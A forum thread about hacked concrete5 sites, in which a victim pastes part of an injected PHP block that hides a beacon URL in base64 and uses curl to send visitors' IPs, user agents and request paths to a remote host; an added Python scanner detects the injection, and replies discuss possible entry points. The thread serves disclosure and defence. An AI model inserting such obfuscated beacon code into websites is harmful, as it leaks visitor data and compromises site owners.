Sites hacked
Hi all
Woke up to two sites hacked, with this code inserted into index.php and various other files (/concrete/models/page.php and some theme files):

```php
<?php if (!isset($sRetry)) {
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    // Skips any client whose User-Agent names a search engine, a major browser
    // or "bot"; only the remaining visitors are reported to the remote host.
    if ((strstr($sUserAgent, 'google') == false)
        && (strstr($sUserAgent, 'yahoo') == false)
        && (strstr($sUserAgent, 'baidu') == false)
        && (strstr($sUserAgent, 'msn') == false)
        && (strstr($sUserAgent, 'opera') == false)
        && (strstr($sUserAgent, 'chrome') == false)
        && (strstr($sUserAgent, 'bing') == false)
        && (strstr($sUserAgent, 'safari') == false)
        && (strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) {
            // Create bot analitics
            // The beacon URL is hidden as a base64 literal; the visitor's IP,
            // User-Agent, host name and request path are appended as query parameters.
            $stCurlLink = base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw')
                . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                . '&useragent=' . urlencode($sUserAgent)
                . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                . '&check=' . isset($_GET['look']);
            $stCurlHandle = curl_init($stCurlLink);
        }
```

[Only the first 15 of the 28 injected lines were pasted.]

It's playing absolute havoc with Firefox's resolution, and it seems to have stopped addFooterItem from working (bizarre).
Laurence
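A file-system check for this particular injection, added here as an example (it is not code from the thread or from concrete5): it flags PHP files that carry the $sRetry guard together with a base64 literal passed to base64_decode() and a curl_init() call, and decodes the literal so the beacon destination is visible. The sample file contents and the example.invalid URL are constructed for the demonstration.

```python
import base64
import os
import re

# Markers taken from the snippet pasted above: the $sRetry guard, a base64
# literal fed to base64_decode(), and curl_init() on the decoded URL.
INJECTION_MARKERS = ("$sRetry", "base64_decode(", "curl_init(")
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def scan_content(text):
    """Return the URLs hidden in base64 if text carries all markers, else []."""
    if not all(marker in text for marker in INJECTION_MARKERS):
        return []
    hits = []
    for literal in B64_CALL.findall(text):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue  # not valid base64, ignore it
        if decoded.startswith(("http://", "https://")):
            hits.append(decoded)
    return hits

def scan_tree(root, exts=(".php",)):
    """Walk a web root and map each infected file to the URL(s) it beacons to."""
    infected = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_content(fh.read())
            except OSError:
                continue  # unreadable file, keep going
            if hits:
                infected[path] = hits
    return infected

# Constructed sample text (not real files): the first mimics the injected
# block with a placeholder beacon URL on example.invalid, the second is benign.
PLACEHOLDER_URL = "http://example.invalid/stat/stat.php"
SAMPLE_INJECTED = (
    "<?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1;\n"
    "$stCurlLink = base64_decode( '" + base64.b64encode(PLACEHOLDER_URL.encode()).decode()
    + "' ).'?ip='.urlencode($_SERVER['REMOTE_ADDR']);\n"
    "$stCurlHandle = curl_init( $stCurlLink ); }\n"
)
SAMPLE_CLEAN = "<?php echo base64_decode('aGVsbG8=');  // harmless decode, no beacon\n"
```

Run `scan_tree('/path/to/webroot')` against a copy of the site to list every file carrying the injection and the URL each one reports to; `scan_content` alone checks a single file's text.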
I followed the hash and after a redirect it ends up at http://botsvsbrowsers.com/
Last news on the homepage was from 2010.
It's also basically impossible to track, the whois info turns up this site:
https://www.domainsbyproxy.com/Default.aspx...
Hope this helps.
I searched for some of the unique strings in the code and there is quite a bit of discussion around the web about it.
It doesn't seem to be a particularly malicious thing, but it does slow down sites to be unusable in Firefox, and in some cases it conflicts with itself and causes real problems.
I'm still not sure how it got in there, whether it was an XSS vulnerability or a server problem. We have maybe 8 concrete5 sites on the server but only two of them were hacked - that might suggest XSS. Who knows.
I have two sites (both hosted by GoDaddy) that I manage. They both run on Joomla 1.7 CMS. I can't figure out how they got in. I'm suspecting bad security on the shared host?
Do you think a key logger/malware got your FTP passwords? Or they've been brute forced. I'd change the password or turn FTP off when not needed.